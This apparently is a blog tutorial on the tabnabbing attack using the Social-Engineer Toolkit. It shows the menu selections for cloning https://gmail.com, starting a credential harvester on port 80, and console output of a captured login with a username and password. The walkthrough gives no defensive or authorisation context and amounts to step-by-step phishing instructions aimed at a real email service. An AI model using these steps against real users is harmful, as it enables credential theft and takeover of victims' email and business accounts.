The tabnabbing attack method is used when a victim has multiple tabs open, when the user clicks the link, the victim will be presented with a “Please wait while the page loads”.
When the victim switches tabs because he/she is multi-tasking, the website detects that a different tab is present and rewrites the webpage to a website you specify. The victim clicks back on the tab after a period of time and thinks they were signed out of their email program or their business application and types the credentials in.
When the credentials are inserts, they are harvested and the user is redirected back to the original website.
Tabnabbing Attack Method
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Victim Web Profiler
9) Create or import a CodeSigning Certificate
99) Return to Main Menu
set:webattack>4
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
the same web application you were attempting to clone.
The third method allows you to import your own website, note that you should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack> 2
SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the URL to clone: https://gmail.com
[*] Cloning the website: https://gmail.com
[*] This could take a little bit…
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] I have read the above message. [*]
Press {return} to continue.
[*] Tabnabbing Attack Vector is Enabled…The victim needs to switch tabs.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
The victim is presented with a webpage that says please wait while the page loads. When the victim switches tabs, the website is rewritten and then enters the credentials and is harvested.
[*] WE GOT A HIT! Printing the output:
PARAM: ltmpl=default
PARAM: ltmplcache=2
PARAM: continue=https://mail.google.com/mail/?
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-9060819085229816070
PARAM: ltmpl=default
PARAM: ltmpl=default
PARAM: scc=1
PARAM: ss=1
PARAM: timeStmp=
PARAM: secTok=
PARAM: GALX=00-69E-Tt5g
POSSIBLE USERNAME FIELD FOUND: Email=sfdsfsd
POSSIBLE PASSWORD FIELD FOUND: Passwd=afds
PARAM: rmShown=1
PARAM: signIn=Sign+in
PARAM: asts=
[*] WHEN YOU FINISHED. HIT CONTROL-C TO GENERATE A REPORT
Post a Comment